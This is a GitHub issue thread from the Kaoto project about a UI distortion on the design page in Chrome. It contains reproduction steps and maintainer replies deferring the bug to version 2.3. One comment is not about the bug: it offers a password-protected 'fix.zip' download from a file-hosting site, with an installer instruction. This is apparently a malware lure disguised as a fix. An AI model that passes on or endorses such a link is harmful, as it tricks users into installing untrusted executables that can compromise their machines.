### ISSUE TITLE
Distorted UI on the design Page if navigated back from a different page

### ISSUE THREAD

**Issue by shivamG640** [KaotoIO/kaoto#1352]
### Describe the Bug

Able to reproduce it only on the Chrome browser!
Also passing the cursor over the wrong part is fixing it!

### Steps to Reproduce the Bug or Issue

1. Create a route.
2. Navigate to a different page.
3. Navigate back to the design page.
4. Check the route in the canvas.

### Screenshots or Videos

[Screencast from 2024-08-26 18-45-54.webm](https://github.com/user-attachments/assets/eed68076-4b0e-4727-a28d-a992ed64728d)

### Platform

- OS: Linux
- Browser: Chrome

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lordrip** [comment]
I cannot reproduce it in VSCode

**Comment by lhein** [comment]
Lets move it then to 2.3 as it doesn't pose a blocking issue for the work with the VS Code Kaoto extension.
